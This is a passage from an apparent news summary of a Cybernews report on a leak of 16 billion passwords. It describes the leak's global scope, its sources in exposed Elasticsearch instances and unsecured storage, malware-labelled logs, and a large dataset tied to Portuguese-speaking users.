- Broad scope: Estimated two leaked credentials per person globally; includes government platforms and internal business tools.
Where Was the Data Found?
- Sources: Publicly exposed Elasticsearch instances, unsecured object storage.
- Collection method: Some logs labeled with malware names or geolocation hints (e.g., “Telegram,” “Russian Federation”).
- Largest dataset: Over 3.5 billion records tied to Portuguese-speaking users.
Reference:
Cybernews Full Report – 16 Billion Passwords Exposed